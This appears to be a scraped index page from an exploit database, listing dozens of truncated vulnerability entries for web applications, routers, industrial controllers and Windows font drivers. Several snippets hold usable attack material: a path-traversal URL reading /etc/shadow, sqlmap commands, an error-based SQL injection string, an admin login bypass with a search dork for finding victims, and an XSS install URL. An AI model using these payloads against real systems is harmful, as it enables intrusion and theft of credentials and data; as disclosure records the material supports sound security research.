Shanghai Huanchuang (上海寰创) WLAN products: DownloadServlet arbitrary file download vulnerability
Requesting the following URL allows arbitrary system files to be downloaded: http://ip:port/DownloadServlet?fileName=../../etc/shadow...
ZeusCart 4 index.php search cross-site scripting vulnerability
ZeusCart is an e-commerce shopping cart application. ZeusCart has a cross-site scripting vulnerability in its handling of the search variable: a remote attacker can build a malicious URI and lure a user into opening it, then obtain sensitive cookies, hijack the session, or perform malicious actions on the client. Affected systems: ZeusCart 4. Release date: 2015-03-10. CVE ID: CVE-2015-2182. CNCVE ID: CNCVE-20152182 ---------------------------------- PoC screenshots from a locally built test environment: ZeusCart 4.1 test environment...
WordPress IBS Mappro plugin arbitrary file read
WordPress is a blogging platform developed in PHP by the WordPress Foundation; it supports hosting personal blog sites on servers running PHP and MySQL. IBS Mappro is a travel map editor and viewer plugin for it. An absolute path traversal vulnerability exists in lib/download.php in versions of the WordPress IBS Mappro plugin before 1.0. A remote attacker can exploit it to read arbitrary files by supplying a full pathname in the 'file' parameter. Affected product: WordPress IBS Mappro plugin 1.0. This code lets a user download an arbitrary file: if (isset($_GET['file'])) { $filename = $_GET['file']; $info =...
w3tw0rk / Pitbul IRC Bot remote command execution
No description provided by source. This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class Metasploit3 'w3tw0rk / Pitbul IRC Bot Remote Code Execution', 'Description' = %q This module allows remote...
e-cology time-based blind SQL injection (hpid parameter)
1. Vulnerable file: homepage/LoginHomepage.jsp 2. Injection parameter: hpid 3. Vendor: Weaver (泛微软件) 4. Proof: sqlmap.py -u "http://localhost/homepage/LoginHomepage.jsp?hpid=52" --technique T --dbms "Microsoft SQL Server"...
Zuitu group-buying (最土团购) /ajax/coupon.php SQL injection vulnerability
Zuitu group-buying: incomplete filtering in a base function leads to injection. Code in ajax/coupon.php: ...... $cid = strval($_GET['id']); // line 5 ...... $coupon = Table::FetchForce('coupon', $cid); // line 44 The id parameter is not filtered and is passed straight into FetchForce. Now look at what FetchForce is, in include/library/table.class.php line 172: static public function FetchForce($n=null, $ids=array()) { if (empty($ids) || !$ids) return...
Shareaholic 7.6.0.3 XSS
File: shareaholic\shareaholic.php add_action('wp_ajax_shareaholic_add_location', array('ShareaholicAdmin', 'add_location')); $_POST['location'] is not escaped. File: shareaholic\admin.php public static function add_location() { $location = $_POST['location']; $app_name = $location['app_name'];...
WordPress Pinboard 1.1.10 Theme Reflected XSS
$_GET['tab'] is not escaped. File: pinboard\includes\theme-options.php function pinboard_theme_page() { add_theme_page( __( 'Pinboard Theme Options', 'pinboard' ), __( 'Theme Options', 'pinboard' ), 'edit_theme_options', 'pinboard_options', 'pinboard_admin_options_page' ); } add_action( 'admin_menu', 'pinboard_theme_page' ); functio...
ZCMS (JSP) V1.1 login bypass & SQL injection & cross-site scripting vulnerabilities
No description provided by source...
Yonyou NC-IUFO system /epp/detail/publishinfodetail.jsp SQL injection vulnerability
No description provided by source...
Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure
No description provided by source...
qibocms 7.0 pm.php stored XSS
No description provided by source...
Joomla vnmshop component (plugin) injection vulnerability
Exploit Title: Joomla vnmshop component (plugin) injection vulnerability Google Dork: inurl:option=com_vnmshop (61,800) Version: all versions Vulnerable link: site.com/index.php?option=com_vnmshop&Itemid=211&catid=78%27 sqlmap -u "http://xxx/index.php?option=com_vnmshop&Itemid=211&catid=78" --dbs ! legal disclaimer: Usage of sqlmap for...
WordPress RevSlider 3.0.3 upload vulnerability
No description provided by source...
WordPress Calculated Fields Form 1.0.10 SQL Injection
No description provided by source...
Chamilo LMS 1.9.10 /main/calendar/agenda_list.php cross-site scripting vulnerability
I. Overview ======================================================== Chamilo LMS 1.9.10 and prior versions are prone to multiple Cross-Site Scripting (Stored + Reflected) and CSRF vulnerabilities. These vulnerabilities allow an attacker to gain control over valid user accounts in the LMS, perform...
ThinkCMF information disclosure vulnerability
No description provided by source...
pluck CMS 4.7.2 Path Traversal
No description provided by source...
SunshineCRM v1 /general/ERP/LOGIN/logincheck.php SQL injection vulnerability
(0day) SunShineCRM v1, open-source software developed by Zhengzhou Dandian Technology Software Co., Ltd. (郑州单点科技软件有限公司), has a SQL injection vulnerability. Analysis: 1. Source analysis: the POST form on the SunShineCRM login page index.php has its action pointing to logincheck.php. Logincheck.php validates the submitted username and password; although it contains code that checks for special characters, it neither filters nor escapes them. 2. PoC: first test whether the injection exists, then use sqlmap to probe the target database information, namely the default database mysql and the CRM system database crmmarket. sqlmap -u...
Centreon <=2.5.3 'exec()' function remote command execution vulnerability
No description provided by source. #!/usr/bin/python # coding: gb2312 # File name: centreonexecrcepoc.py # Written: 2014-12-09 # Updated: 2015-07-17 # Vulnerability: Centreon 'exec' function remote command execution # Affected versions: Centreon # Parameter - Debug - Authentication debug - Yes # References: Bugtraq ID: 71333 http://www.securityfocus.com/bid/71333/ import sys import urllib flag =...
Taizhou Jisu Network CMS (台州市极速网络CMS) /data/log/passlog.php arbitrary code execution vulnerability
First look at login.php in the root directory: <?php $ISLOGIN = true; require "./includes/headinc.php"; register_shutdown_function('unionend'); if ($action == 'logout') { $unionuser = $unionpass = $gid = ''; //clearcookies(); //$sessarr = array(); $_SESSION['sessarr'] = $sessarr = ''; session_unregister('sessarr'); echo "<meta http-equiv=\"refresh\"...
Rockwell Automation ControlLogix firmware upload vulnerability
The device does not properly authenticate users, allowing a remote user to upload a new firmware image to the Ethernet card, and it does not check whether the image is legitimate or corrupted; an attacker can exploit this to take control of the device or crash it....
MvMmall online store system /search.php SQL injection vulnerability
No description provided by source...
Wanhu OA (万户OA) defaultroot/download_ftp.jsp arbitrary file download vulnerability
No description provided by source...
ASUS TM-AC1900 stack buffer overflow vulnerability
No description provided by source...
Kirby CMS <= V2.1.0 file upload vulnerability
1. Vulnerability analysis. Download location of the vulnerable program: http://download.getkirby.com/files/kirby-2.1.0.zip panel/app/controllers/api/files.php line 220: <?php if (strtolower($file->extension()) == kirby()->option('content.file.extension', 'txt')) { throw new Exception('Content files cannot be uploaded'); } else if (strtolower($file->extension()) == 'php' or...
OpenSNS v1.7.1 index.php SQL injection
No description provided by source...
Unauthorized access on a Yonyou subdomain leads to command execution
Summary: unauthorized access. Details: the JBoss web-console was configured without access restrictions, leading to a command execution vulnerability. Proof: http://shenpi.yonyou.com/web-console/...
Maxthon 4.3.0.300 prompts to install an arbitrary extension, exposing the external interface
http://extension.maxthon.cn/all/index.php?keyword=%22/%3E%3Cimg%20src=x%20onerror=%22external.mxCall%28%27InstallApp%27,%20%27http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon%27%29;%22/%3E When opened, it prompts to install the extension http://extensiondl.maxthon.cn/skinpack/12041659/1356423316.mxaddon. external Objec...
Hanweb (大汉网络) vipchat upload getshell vulnerability (with a case)
Summary: Hanweb vipchat upload getshell vulnerability. Details: step 1, forge the session value clusterid. Address: /vipchat/VerifyCodeServlet?var=clusterid None...
74CMS (V 3.5.2 - 20150423) SQL injection caused by the insecurity of utf8_to_gbk()
No description provided by source...
Windows win32k.sys TTF Font Processing win32k!fsc_BLTHoriz Out-of-Bounds Pool Write
Source: https://code.google.com/p/google-security-research/issues/detail?id=402&can=1 We have encountered a Windows kernel crash in the win32k!fsc_BLTHoriz function while processing corrupted TTF font files, such as: --- DRIVER_PAGE_FAULT_BEYOND_END_OF_ALLOCATION (d6) N bytes of memory was allocated and...
Windows win32k.sys TTF Font Processing IUP[] Program Instruction Pool-Based Buffer Overflow
Source: https://code.google.com/p/google-security-research/issues/detail?id=368&can=1 We have encountered a number of Windows kernel crashes in the win32k!itrp_IUP function (a handler of the IUP TTF program instruction) while processing corrupted TTF font files, such as: --- PAGE_FAULT_IN_NONPAGED_AREA ...
Windows ATMFD.DLL Out-of-Bounds Read Due to Malformed Name INDEX in the CFF Table
Source: https://code.google.com/p/google-security-research/issues/detail?id=386&can=1 We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as: --- DRIVER_PAGE_FAULT_IN_FREED_SPECIAL_POOL (d5) Memory was referenced after it...
Konica Minolta FTP Utility 1.0 - directory traversal vulnerability
No description provided by source...
Zoomla (逐浪) CMS 2.X \Common\file.aspx SQL injection vulnerability
Vulnerable file: \Common\file.aspx. Note: this file contains two injection parameters; the parameter analysed here is code. Code analysis: protected void Page_Load(object sender, EventArgs e) { string str = "http://" + HttpContext.Current.Request.Url.Authority.ToString() + "/UploadFiles/" + this.ull.GetLogin(true).UserName; if (base.Request.QueryString["code"] == null &&...
h5ai < 0.25.0 /server/php/inc/Api.php 任意文件上传漏洞
No description provided by source...
Windows win32k.sys TTF Font Processing win32k!scl_ApplyTranslation Pool-Based Buffer Overflow
Source: https://code.google.com/p/google-security-research/issues/detail?id=370&can=1 We have encountered a number of Windows kernel crashes in the win32k!scl_ApplyTranslation function while processing corrupted TTF font files, such as: --- PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was...
Rockwell Automation ControlLogix remote denial of service vulnerability
Cause: boundary condition error. Affected systems: Rockwell Automation MicroLogix 1400, Rockwell Automation MicroLogix 1100. A remote attacker can exploit the vulnerability to crash the device. Attack prerequisites: the attacker must be able to reach the Rockwell Automation MicroLogix product. Vulnerability details: Rockwell Automation MicroLogix is a programmable controller platform. The device does not validate the data copied into a buffer, allowing a remote attacker to send ... to 2222/TCP, 2222/UDP,...
Joomla Spider Random Article Component - SQL Injection
Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability Author : Jagriti Sahu AKA Incredible Vendor Link : http://demo.web-dorado.com/spider-random-article.html Date : 22/03/2015 Discovered at : IndiShell Lab Love to : error1046 ^^ ,Team IndiShell,Codebreaker ICA...
WordPress 3.8.2 cookie forgery vulnerability
0x00 Background: Reading the WordPress 3.8.2 patch analysis of the HMAC timing attack was eye-opening; it turns out timing differences can be used to determine an HMAC. But I always felt this vulnerability was not simply a fix for that problem. Checking the official material: "The vulnerability was discovered by WordPress security team member Jon Cave." Perhaps the vulnerability can also be exploited in the following way. 0x01 A PHP characteristic: when PHP performs non-strict comparisons such as "==" and "!=", it coerces values according to their actual contents. When one operand is an integer, the other operand is coerced to an integer. 0x02 Analysing the fix: the official diff changed only one place in the PHP code:...
Wordpress Plugin Store Locator Plus 4.2.23 Email Injection
If we hold a valid "key" we can send mail to anyone. File: store-locator-le\include\send-email.php if (!wp_verify_nonce($_REQUEST['valid'], 'em')) die(); $messageheaders = "From: " . $_GET['emailname'] . "...
Windows win32k.sys TTF Font Processing win32k!fsc_RemoveDups Out-of-Bounds Pool Memory Access
Source: https://code.google.com/p/google-security-research/issues/detail?id=401&can=1 We have encountered a Windows kernel crash in the win32k!fsc_RemoveDups function while processing corrupted TTF font files, such as: --- PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. This canno...
Espcms v5.0 /index.php SQL injection vulnerability
Construct: www.xxx.cc/index.php?ac=search&at=taglist&tagkey=%2527,tags orselect 1 fromselect count,concatselect select concat0x7e,0x27,tablename,0x27,0x7e from informationschema.tables where tableschema=database limit 0,1,floorrand02x from informationschema.tables group by xa%23...
F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability
+------------------------------------------------------+ + F5 BIG-IP 10.1.0 - Directory Traversal Vulnerability + +------------------------------------------------------+ Affected Product : F5 BIG-IP Vendor Homepage : http://www.f5.com/ Version : 10.1.0 Vulnerability Category : Local vulnerabilit...
DianYiPS V3.0 site-builder system backend SQL injection vulnerability
Nanning Dianyi Digital Technology Co., Ltd., known as Dianyi Design (http://www.dianyisheji.com/). The injection point is the username field on the site's backend login page. Affected sites can be located by searching Google for: powered by DianYiPS; appending /dianyi/ to the domain reaches the admin backend, where the universal password admin' or '1'='1 logs in....
Generic SQL injection vulnerability in an online training system
Summary: Details: a generic SQL injection vulnerability in an online training system. http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 http://.../WebOrg/TCHlist.aspx?typeid=9 Proof:...
FireEye Appliance - Unauthorized File Disclosure
Just one of many handfuls of FireEye / Mandiant 0day. Been sitting on this for more than 18 months with no fix from those security "experts" at FireEye. Pretty sure Mandiant staff coded this and other bugs into the products. Even more sad, FireEye has no external security researcher reporting...
WordPress Esplanade 1.1.4 Theme Reflected XSS
$_GET['tab'] is not escaped. File: esplanade\includes\theme-options.php function esplanade_theme_page() { add_theme_page( __( 'Esplanade Theme Options', 'esplanade' ), __( 'Theme Options', 'esplanade' ), 'edit_theme_options', 'esplanade_options', 'esplanade_admin_options_page' ); } add_action( 'admin_menu', ...
Windows ATMFD.DLL Write to Uninitialized Address Due to Malformed CFF Table
Source: https://code.google.com/p/google-security-research/issues/detail?id=385&can=1 We have encountered a number of Windows kernel crashes in the ATMFD.DLL OpenType driver while processing corrupted OTF font files, such as: --- PAGE_FAULT_IN_NONPAGED_AREA (50) Invalid system memory was referenced. Th...